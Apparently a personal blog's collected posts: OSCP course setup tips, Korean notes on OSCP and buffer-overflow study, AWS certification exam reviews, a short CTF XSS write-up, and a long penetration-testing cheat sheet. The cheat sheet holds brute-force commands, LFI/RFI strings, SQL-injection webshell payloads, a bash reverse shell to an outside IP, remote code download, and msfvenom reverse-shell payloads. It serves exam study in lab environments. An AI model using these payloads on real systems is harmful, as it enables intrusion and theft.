Once Offensive Security Course Started…

Whoever just signed up for Offensive Security Courses; PWK for OSCP or AWAE for OSWE, there are couples of things that you need to be aware.

Back up the Course Materials

Once course started, you will received the email from Offensive Security regarding the course materials. This is super [Time-Sensitive] because you only have 3 days to download the course materials.

There will be two separate links; one is for PDF and one is for Video. You must download course materials as soon as you can and make sure you have a backup for the course materials. Offensive Security do not retain the copies and if you somehow couldn’t download the course materials in time or lost it, they will ask you to pay for it.….

Set up the Kali with VPN connection

In the same email that you received, you will see the connectivity pack, lab-connection.tar.bz2. Download your preferable Kali and set up the VPN connection in your Kali.

  1. Download Kali https://www.kali.org/downloads

  1. Create a new virtual machine with VMware Workstation Player(free)
  2. Use the downloaded Kali .iso image to create new Kali vm.

4. Once you create a Kali VM, login to the Kali and download the VMware Tools.

Guide Reference : https://linuxconfig.org/how-to-install-vmware-tools-on-kali-linux

5. After then, you can just simply drag the “lab-connection.tar.bz2” file and unzip it.

  • tar xvf labconnection.tar.bz2
  • openvpn OS-XXXX-XXX.ovpn
  • Type the username and password (the credentials will be in the Offensive Security email)

You can also create a text file with username and password on it and update the .opvn file to automate the login process.

  • create pass.txt file with username and password per each line.
  • Now you can connect to VPN without typing username and password.

    OSCP 자격증소개

    OSCP (Offensive Security Certified Professional)은 Offensive Security 기관에서 제공하는 해킹 자격증이다. *Offensive Security는 미국 국제 정보보안 회사로 ExploitDB 취약점 데이터베이스 및 칼리리눅스(Kali Linux)를 제공하는 기관이다.

    기타 정보보안자격증과 다르게 24시간안에 해킹을 해야하는 100% 실습시험인데,

    주어진 시간안에 해킹을하고 보고서를 제출하는 자격증이다 보니, 일반 정보보호 자격증보다 가격이 비싸고 합격률도 낮다. 그래도 미국에선 해당 자격증을 따기만하면 기본적인 100k – 120k (1억-1억2천) 연봉은 보장이 되는데. 그정도로 인지도가 높은 자격증 중에 하나이다.

    OSCP 자격증

    • 주관기관 : Offensive Security
    • 자격증시험 : 100% 실무
      • 시험 시간 : 24시간 + 24시간(보고서작성) = 총 48시간
      • 시험 내용 : 24시간 안에 주어진 가상머신들의 최고관리자 권한 획득 후, 그다음 24시간안에 모의해킹 레포트를 제출하세요.
      • 시험 준비 기간 : 6 – 9개월 (개인마다 차이가 있음)
    • 공식 사이트 : https://www.offensive-security.com/

    Scanning – Web

    Web Login Form Brutefocing

    HTTP Hydra

    hydra -l admin -P /usr/share/wordlist/SecList/Passwords/10k_most_common.txt 192.168.88.162 http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid" -t 64
    
    

    PUT method

    nmap -sV --script http-put --script-args http-put.url=’/test/meterpreter4444.php’,http-put.file=’/root/Exam0119/pwd/192.168.111.149/meterpreter4444.php’ -p 80 192.168.111.149
    nmap –script http-methods –script-args http-methods.url-path=’/uploads’,http-methods.test-all -p 8585 172.28.128.3
    
    

    Starting Web Service

    //Attacker usually uses this to transfer files
    python -m SimpleHTTPServer 8080
    python3 -m http.server 80"
    
    

    Nmap Scanning for Web Service(HTTP/HTTPS)

    nmap -PN -p 22 --open -oG - 10.11.1.* | awk '$NF~/ssh/{print $2}'
    nmap 10.11.1.* -p22,80 --open -oG - | awk '/22\/open.*80\/open/{print $2}'
    nmap 10.11.1.* -p80,8080 --open -oG - | awk '/80\/open.*8080\/open/{print $2}'
    nmap -p 80,8080 10.11.1.1-255
    
    

    – Uniscan Scanning

    uniscan.pl -u target -qweds
    
    

    – HTTP Enumeration 

    httprint -h http://www.example.com -s signatures.txt
    
    

    – Directory Traversal 

    To navigate and find any sub directories.
    Dirbuster Wordlist : /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

    dirb http://10.11.1.202 /usr/share/dirb/wordlists/vulns/iis.txt
    gobuster -u http://10.11.1.133/ -w /usr/share/wordlists/dirb/common.txt -q -n -e
    dirb http://10.11.1.133/index/sips/ /usr/share/dirb/wordlists/
    ./dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u $targetip -e php"
    //cf. https://github.com/maurosoria/dirsearch
    
    //removing status code for 200,204,301,307,403; 
    gobuster -s 200,204,301,307,403 -u http://192.168.88.168 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
    
    

    – Nikto 

    nikto -h 192.168.88.132
    nikto -h http(s)://[IP]:[PORT]/[DIRECTORY] 
    nikto -C all -h http://10.11.1.72"
    
    

    LFI(Local File Inclusion)

    lfisuite.py
    eg.

    browse.php?file=php://filter/convert.base64-encode/resource=ini.php
    browse.php?file=php://filter/convert.base64-encode/resource=browse.php
    echo -n encodedstrings | base64 -d
    browse.php?file=/etc/passwd
    index.php?file=
    
    

    If target has phpinfo.php, check out “file_uploads”, see if appears as enabled(ON); if so, the target is vuln for LFI.

    Uploading malicious .php file on database 

    ref : http://hackingandsecurity.blogspot.com/2017/08/proj-12-exploiting-php-vulnerabilities.html
    SQL-phpshellscript : create below malicious (shell).php script on DB

    Windows : SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\shell.php"
    Linux : SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/shell.php"
    
    

    After uploading above maclious php webshell, browse to the page with command, eg. http://192.168.1.101/DBlocation/shell.php?cmd=ipconfig

    RFI(Remote File Inclusion) 

    eg.

    browse.php?file=http://10.11.0.42/index.html
    browse.php?file=ftp://10.11.0.42/index.html
    browse.php?expect://ls
    
    

    Gain a shell via phpinfo.php ref: https://office.tuxcon.com/root/web-sec-payloads/src/commit/fd99da6c06e00a596becdcfc6d2efe50bad0f47c/File Inclusion – Path Traversal

    Squid 

    proxy scanner/http/squid_pivot_scanning
    RHOST : Target
    RANGE : Target
    RPORT : Squid port

    msf auxiliary(scanner/http/squid_pivot_scanning) > run
    [+] [192.168.88.155] 192.168.88.155 is alive but 21 is CLOSED
    [+] [192.168.88.155] 192.168.88.155:80 seems OPEN
    if the target uses squid proxy via 3128 port, use nikto with that proxy setting 
    nikto -h 192.168.88.155 -useproxy http://192.168.88.155:3128"
    
    

    ShellShock 

    nikto scan results; shows shellshock on /cgi-bin; use 34900.py

    root@kali:~/Exam/Sicos1# python 34900.py payload=reverse rhost=192.168.88.155 lhost=192.168.88.157 lport=1234
    [!] Started reverse shell handler
    [-] Trying exploit on : /cgi-bin/status"
    
    

    MySQL 

    nmap -sV -Pn -vv –script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 10.0.0.1 -p 3306
    
    

    MySQL login : sh mysql -h 192.168.88.152 -D wordpress -u root -p plbkac
    MySQL Spawning Reverse shell(linux) : union select ""<?php exec(\""/bin/bash -c \'bash -i >& /dev/tcp/159.203.242.172/1999 0>&1\'\"");"" INTO OUTFILE '/var/www/ecustomers/samshell4.php'

    UPLOAD A FILE :

    ' union select ""<?php file_put_contents(\""root\"", file_get_contents(\""http://attack.samsclass.info/root\"")); ?>"" INTO OUTFILE '/var/www/ecustomers/samget2.php' #
    
    

    OPEN A PHP SHELL :

    ' union select ""<?php system($_REQUEST['cmd']); ?>"" INTO OUTFILE '/var/www/ecustomers/samshell.php' #
    
    

    Windows IIS 

    Getting Windows 0S and version details through Nikto / Nmap Scanning.

    auxiliary/admin/http/iis_auth_bypass

    Tomcat 

    Default cred for Tomcat;“tomcat/tomcat” and check out /manager console by navigating to browsereg. http://10.11.1.209:8080/manager/html
    You can upload reverse shell on manager consor ; msfvenom jsp or war file

    msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.37 LPORT=443 -f war > shell.war
    jar -xvf shell.war
    
    

    Config files 

    PHP + DB cred files

    /etc/mysql/my.cnf 
    /var/www/html/config.php
    
    

    WordPress 

    wpscan --url http://10.11.1.71/ -enumerate p
    wpscan --url 10.0.2.4 --enumerate vp
    wpscan --url https://192.168.88.152:12380/blogblog -enumerate u --disable-tls-checks
    wpscan --url http://192.168.88.179/wordpress/ --wordlist /usr/share/wordlists/rockyou.txt
    wpscan --url https://192.168.88.152:12380/blogblog/ --enumerate ap --disable-tls-checks
    wpscan --url www.local.test --enumerate u --threads 50
    
    

    ref : finding username & password(autoscript) : https://github.com/claudioviviani/bash-wordpress-xml-bruteforce

    PHPAdmin 

    http://.../phpmyadmin
    db and password located @ /etc/phpmyadmin/config-db.php and default cred can be; (root/blank)(pma/blank)
    You can also bruteforce by sh hydra 10.10.10.43 -l admin -P /usr/share/dict/rockyou.txt http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password!"

    Webdav

    WebDav Vulnerability Check : nmap -T4 -p80 --script=http-iis-webdav-vuln 10.11.1.229
    auxiliary : webdav_test

    cadaver http://10.11.x.x/webdav/
    

    Uploading shells.txt to `shells.txt’

    dav:> put shells.txt
    dav:> copy shells.txt shells.asp;.txt
    

    ColdFusion (Vulnerable)

    Version check : http://example.com/CFIDE/adminapi/base.cfc?wsdl
    LFI(passowrd file) : http://server/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/…/…/…/ColdFusion8/lib/password.propertiesen
    (either – neo-security.xml and password.properties)
    ref : https://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/

    exploit/windows/http/coldfusion_fckeditor – only for 8.0.1

    XAMPP

    XAMPP cred(wampp/xampp)

    RealVNC

    RealVNC : https://www.exploit-db.com/exploits/36932
    Edit, BIND_ADDR into mine and BIND_PORT into 4444
    root@kali:~/PWK-Lab/10.11.1.227$python RealVNC-exploit-36932.py
    [] Please input an IP address to pwn: 10.11.1.227
    [
    ] Hello From Server: RFB 003.008
    Ctrl+Alt+Shift+Del will be vmware’s ctrl+alt+del

    SquirrelMail

    https://raw.githubusercontent.com/xl7dev/Exploit/master/SquirrelMail/SquirrelMail_RCE_exploit.sh

    AT-TFTP

    1.9 version : ref: https://github.com/brianwrf/cve-2006-6184

    perl -e 'print ""\x81\xec\xac\x0d\x00\x00""' > stackadj
    msfvenom -p windows/shell/reverse_nonx_tcp LHOST=10.11.0.37 LPORT=443 R > payload
    cat stackadj payload > shellcode
    cat shellcode | msfvenom -e x86/shikata_ga_nai -b ""\x00"" -a x86 --platform win -f python
    
    

    MISC

    Drupal cred(admin/admin)
    Elastix “cred(admin/admin) http://example.com/vtigercrm/
    You might be able to upload shell in profile-photo.

    Post-Exploit: Transferring Files

    File Transfer

    Below methos can be used to transfer files…

    Transferring Files to Windows

    Running Webserver on Kali

    python -m SimpleHTTPServer 8080 
    
    

    Transfer with Netcat

    //Kali
    nc -lvp 1234 > zeroday.txt
    //Win 
    nc 192.168.0.114 1234 < zero-day.txt
    
    

    ref: https://blog.ropnop.com/transferring-files-from-kali-to-windows/

    TFTP 
    If target has tftp running, you can easily check it by typing tftp on windows cmd.
    Starting tftp service :

    atftpd --daemon --port 69 /tftp 
    /etc/init.d/atftpd restart
    cd /srv/tftp
    cp /var/www/html/nc.exe .
    
    
    //transfer nc.exe  
    tftp -i 10.11.0.42 GET nc.exe
    //PUT
    tftp -i 10.11.0.42 PUT test.txt
    
    

    FTP 
    Setup FTP service by downloading pyftp library

    apt-get install python-pyftpdlib  
    python -m pyftpdlib -p 21 -w
    
    

    Transfer with FTP commands

    You can also automate ftp process by creating ftp.txt

    echo open 10.11.0.42>ftp.txt
    echo anonymous>>ftp.txt
    echo password>>ftp.txt
    echo binary>>ftp.txt
    echo get nc.exe>>ftp.txt 
    echo bye>>ftp.txt
    ftp -s:ftp.txt
    
    

    cf. Setting FTP

    groupadd ftpgroup 
    useradd -g ftpgroup -d /dev/null -s /etc ftpuser
    pure-pw useradd offsec -u ftpuser -d /ftphome 
    pure-pw mkdb 
    cd /etc/pure-ftpd/auth/ 
    ln -s ../conf/PureDB 60pdb 
    mkdir -p /ftphome 
    chown -R ftpuser:ftpgroup /ftphome/ 
    /etc/init.d/pure-ftpd restart
    
    
    root@kali:~# chmod 755 setup-ftp 
    root@kali:~# ./setup-ftp 
    Password: 
    Enter it again: 
    Restarting ftp server
    
    

    Creating VBscript 
    wget.vbs * VBScript (eg. in Windows XP, 2003)

    //wget.vbs
    
    echo strUrl = WScript.Arguments.Item(0) > wget.vbs
    echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
    echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
    echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
    echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
    echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
    echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
    echo Err.Clear >> wget.vbs
    echo Set http = Nothing >> wget.vbs
    echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
    echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
    echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
    echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
    echo http.Open "GET",strURL,False >> wget.vbs
    echo http.Send >> wget.vbs
    echo varByteArray = http.ResponseBody >> wget.vbs
    echo Set http = Nothing >> wget.vbs
    echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
    echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
    echo strData = "" >> wget.vbs
    echo strBuffer = "" >> wget.vbs
    echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
    echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
    echo Next >> wget.vbs
    echo ts.Close >> wget.vbs
    

    Usgage : cscript wget.vbs http://10.11.0.42/wget.exe wget.exe

    PowerShell- (in Windows 7, 2008, and above)
    wget.ps1

    echo $storageDir = $pwd > wget.ps1 
    echo $webclient = New-Object System.Net.WebClient >>wget.ps1 
    echo $url = "http://10.11.0.42/nc.exe" >>wget.ps1 
    echo $file = "nc.exe" >>wget.ps1 
    echo $webclient.DownloadFile($url,$file) >>wget.ps1 
    

    Usgage : powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive NoProfile -File wget.ps1

    Basic Scanning

    Default Nmap Scanning

    nmap -sU -sV -n --top-ports 200 192.168.1.30  > /root/PWK-Lab/192.168.1.30/nmap-udp
    nmap -sT -sV -A -O -v -p 1-65535 192.168.1.30 > /root/PWK-Lab/192.168.1.30/nmap-tcp
    

    -sS stealth scanning

    nmap -vv -Pn -A -sC -sS -T 4 -p- 10.x.x.x
    nmap -p- -sS -A 10.x.x.x
    
    • Vulnerability Scanningnmap -sS -sV --script=vulscan/vulscan.nse 10.x.x.x
    • OS detectionnmap -O -v 10.x.x.x

    Automated scanning tools

    • Reconnoitre : python /root/Recon/Reconnoitre/reconnoitre.py -t 10.x.x.x - /root/PWK-Lab/10.x.x.x/ --services
    • OneTwoPunch : vi targets.txt; onetwopunch.sh -t targets.txt -p all -n "-sV -O --version-intensity=9"
    • unicornscan -i tap0 -I -mT 10.x.x.x:a
    • masscan -p0-65535 10.x.x.x –rate 150000 -oL output.txt

    Scanning per protocols

    – SSH(22)

    • Bruteforce :
    nmap -p 22 --script ssh-brute --script-args userdb=users.txt,passdb=users.txt --script-args ssh-brute.timeout=4s 10.x.x.x 
    hydra -l user -P /usr/share/wordlists/rockyou.txt  10.x.x.x ssh -t 4
    

    ref : https://github.com/g0tmi1k/debian-ssh && https://blog.g0tmi1k.com/2010/04/pwnos/
    OpenF*** (Apache mod_ssl < 2.8.7 OpenSSL) 764.c

    – FTP(21)

    • Default cred : anonymous/anonymous | ftp/ftp | ftpuser|ftpuser
    nmap -sV -Pn -vv -p 21  --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 10.x.x.x
    nmap --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 10.x.x.x
    check windows OS files : https://www.quora.com/How-can-I-tell-what-version-of-Windows-is-installed-on-a-hard-drive-without-booting-it 
    
    • Bruteforce :
    medusa -h 10.x.x.x -u user -P /root/SecLists/Passwords/bt4-password.txt -M ftp 
    ./root/PWK-Lab/FTP/ftp-user-enum-1.0/ftp-user-enum.pl -U /root/PWK-Lab/fuzzdb/bruteforce/names/simple-users.txt -t 10.x.x.x
    

    – SMTP(25)

    • Vulnerability Check
    nmap --script smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.x.x.x 
    
    • Enumerating Users
    nmap --script smtp-enum-users.nse 10.x.x.x
    
    smtp-user-enum -M VRFY -U users.txt -t 10.x.x.x
    smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 10.x.x.x
    smtp-user-enum -M VRFY -U  /usr/share/seclists/Usernames/Names/names.txt -t 10.x.x.x
    
    • Connecting to Mail Server
    telnet IPADDRESS 25
    nc -nvv IPADDRESS 25
    
    • msf module : auxiliary/scanner/smtp/smtp_enum

    – POP3(110)

    • Bruteforce : hydra -L usr.txt -P /usr/share/wordlists/fasttrack.txt -t20 10.x.x.x -s55007 -I pop3
    • POP3 command
    USER boris
    PASS *****
    LIST 
    RETR 1 
    

    – SNMP(161)

    • Default Community Strings : public/private/manager
    snmp-check -t [IP] -c public 
    snmpwalk -c public -v1 10.0.0.0 
    nmap -sU --open -p 161 10.11.1.0/24 -oG mega-snmp.txt 
    sudo nmap -sU -p 161 --script default,snmp-sysdescr 10.11.1.0/24 
    onesixtyone -c community -i ips 
    
    nmap 10.11.1.* -p161 --open -oG - | awk '/161\/open/{print $2}' 
    

    – SMB(139,445)

    • Checking SMB port open/running :
    nmap -A -p 139,445 10.11.1.1-254 -oG smb_service.txt; grep Up smb_service.txt | cut -d "" "" -f 2  
    nmap 10.11.1.* -p139,445 --open -oG - | awk '/139\/open.*445\/open/{print $2}'  
    
    • Vulnerability scanning 

     nmap -p 139,135,445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse 10.x.x.x

    • Enumerating Users  

    nmap --script smb-enum-users.nse -p445 10.x.x.x nmap -sU -sS --script smb-enum-users.nse -p U:137,T:139 10.x.x.x

    • smbclient
    smbclient -L //10.x.x.x/share -U user 
    smbclient //10.x.x.x//IPC$ -N  
    
    • checking access
    acccheck -v -t 10.x.x.x  -u user -P /usr/share/dirb/wordlists/common.txt  
    acccheck -v -t 10.x.x.x -U /root/Vulnhub/Stapler/user.txt  -P /usr/share/dirb/wordlists/common.txt  
    
    • smbmap
    smbmap -u user -p user -d share -H 10.x.x.x  
    smbmap -u user -p .bash_history -d share -H 10.x.x.x  
    smbmap -H 10.x.x.x\share -u user -p '.bash_history' -L  
    

    ref : https://hackercool.com/2016/07/smb-enumeration-with-kali-linux-enum4linuxacccheck-smbmap/

    OSCP 공부법 – 버퍼오버플로우

    OSCP 에 합격하기 위해선 BoF 버퍼 오버플로우에 대해 잘 알고있어야한다. 이미 Offensive Security 에서 BoF 에 관련된 자료들을 많이 주지만, 해당 PWK에서 제공하는 Lab과 Course exercise는 시험을 대비하기 충분하지 않다.

    그래서 일부러 시험준비를 위해 Exploit-db에 있는 사용가능한 BoF 취약점들을 응용해 공부했다. exploit-db(https://www.exploit-db.com/)에들어가면 여러가지 다양한 취약점과 취약점을 이용한 코드들을 볼수있는데.

    Buffer Overflow라 검색을 하고, vulnerable application이 있는지 여부를 필터링해서, 해당 취약 어플리케이션이 있는 경우.  VM 가상머신에 비슷한 환경을 만들어서 코드를 만드는걸 연습해보았다. (예를들어서, SLmailv5.5 버퍼오버플로우 취약점의경우, exploit-db에서 해당 취약프로그램을 다운받아 Windows VM 에 설정한후, 공격칼리로 직접 BoF를 만들어서 공격을 함)

    이미 다른사이트에서도 버퍼오버플로우 연습으로 많은 프로그램이 올라와있는데, 나는 아래와같은 취약 프로그램을 이용했다

    AWS Certified Security Specialty Study Guide

    Overall, it took me about 3 months for studying this exam with full-time 40hrs/week job. I’m pretty sure anyone who has more hands-on experience in AWS environment will take less than 3 months to pass this exam.

    studying

    Study Material;

     

    Study Plan;

    I spent first two months listening ACloudGuru course and make my own notes, then watched LinuxAcademy. ACloudGuru course does cover all of exam topics, though you still need to fill more details based on AWS FAQ or whitepapers. I really like the structure of A Cloud Guru‘s, having summary video and practice quiz for individual chapter; where students can refresh their memory and go for further research & study based on quiz’s feedback. Linux Academy course has really useful feature; lab, where you can go into their temporary aws console and practice it. If you prefer to learn hands-on things, I would recommend LinuxAcademy.

     

    *TIPS* since we are busy worker or have other things to do in real-life, it’s pretty tough to find extra time for studying. So I print out the courses’ summary/note in small&pocket size and read it during commute or lunch time at work. You can find summary&exam notes in github or quizlet; Brianlam38 github and Antoine_Sylvia quizlet. I also upload the mindmap that created during aCloudGuru course on my github.

    summary-note

    After finishing online courses for 2 months, I started to practicing with exam simulator. I took ACloudGuru Exam Simulator and got 60 at first… and I realize that I’ve never studied this topic as scenario-based before. *Unlike AWS Practitioner Exam, Security Specialty Exam has a lot of scenario based questions and you get to choose either more reasonable or secure answer(depends on the questions, the answer can be cost-effective choice). So I practice with ACloudGuru & BrainCert and learned AWS security services within the real-life examples because I ended up reading bunch of AWS whitepapers and AWS Security Blogs articles based on feedback I got from each test.

    By the time I got 95 score on ACloudGuru Exam Simulator, I decide to book the exam.I also took AWS Certified Security Specialty practice exam online; but this one doesn’t show how much score you got nor which question incorrectly.. So, you can buy a practice game (It was free for me since I got voucher code from previous AWS cert exam), if you want to see the level of difficulty of exam.

    practice exam

    If you prefer to read additional study material & study plan, I find below blogs&sites are useful;

     

    AWS Certified Security Specialty Exam Review – 2020

    The AWS Certified Security – Specialty helps you broad understanding about Security principals and architecture of AWS environment and also deep-dive of security tools and service that aws provides.

    The exam format is multiple choice, multiple answers; 170 minutes(Practice test is $40)  and costs 300 USD. *TIPs* When you register your exam or practice exam, you can get 50% OFF for exam fee and FREE practice exam if you have vouchers to use from previous AWS cert test. Luckily, I had vouchers to use for both after passing practitioner test. benefits

    For more details about exam, please check AWS official website and AWS Certified Security Specialty Exam Guide

    I took exam on Feb 17th, 2020 10:00AM, it took me literally entire 160 minutes to finish. I had 10 minutes before time out, and had 5 more survey questions after the exam questions review :o..  The level of exam is tougher than i thought. I’m glad that I pass. I will update more study plan & material I used for study on next posting.

    AWS Certified Practitioner Exam Review-2019

    AWS Certified Cloud Practitioner; passing exam within one month.

    I started studying for AWS Certified Cloud Practitioner on Aug 31st. I finished all 6 chapters from a CloudGuru during weekends. I believe the course itself is 6 hours total.

    During video lectures, I wrote down few keynotes & summary, since I tend to get easily distracted with online courses. After memorizing keynotes and summary the notes, I finish practice test on CloudGuru with 86 score. And spent one or two weeks reading the suggested whitepapers from AWS examguide. I only read below 3 white papers just one time each.

    • Overview of Amazon Web Services whitepaper, July 2019
    • Architecting for the Cloud: AWS Best Practices whitepaper, October 2018
    • How AWS Pricing Works whitepaper, June 2018

    After then, I purchased AWS Certified Cloud Practitioner practice test on Udemy. I personally feel the level of difficulty is like; so I want to point out the actual exam questions can be difficult than CludGuru Practice Test.

    There’s also (free) course from AWS training website for AWS Cloud Practitioner but personally CloudGuru is more informative and user-friendly, in my opinion. So I skip AWS training course and just complete AWS Cloud Practitioner practice test(free).

    [ AWS Cloud Guru Practice Test < Exam < Udemy Practice Test ].

    While taking Udemy practice test, I notice there are few terminology that I’ve never heard of during CloudGuru course. Probably may have been read it on the AWS whitepapers before.. So I review the Udemy answers and memorize terminologies that appeared frequently during the test.

     

    AWS Certified Cloud Practitioner; Online Exam (CBT)

    I booked proctoring exam on Sept 28th for 4PM(EST). I book online computer based exam through online. You can check more details about how to book online exam; https://aws.amazon.com/blogs/apn/now-you-can-take-the-aws-certified-cloud-practitioner-exam-at-your-home-or-office-24-7/

    I joined the exam interface before 30 minutes and confirmed all the devices working fine. There was some technical issues during the exam, but it didn’t impact me a lot during 90 minutes of exam time.

    ctfbook-web

    Once executing the program, it shows login page and mailbox image. For some reaonse, it’s not allowing us to modify or click anything.

    Image 2

    To check out this program, I run nmap scanning for local ip 127.0.0.1 and see which port and protocol is running. I notice 25 port is opened with ESMTP protocol.

    nmap

    So, i telnet into the mail server and check out the banner(title).

    TELNET

    So, i pull the spam email via SMTP command, but it seems like the data isn’t pulling or listing. Instead of checking the emails, i try to sending emails.

    Image 7

    Since the program named,  XSS Bonasai Revolutions, Cross-site-scripting might be related, so I send below email and check out the program.

    sendingsending

    results

    now I can see the vulnerable field is a date, so I put XSS instead of <img src=0>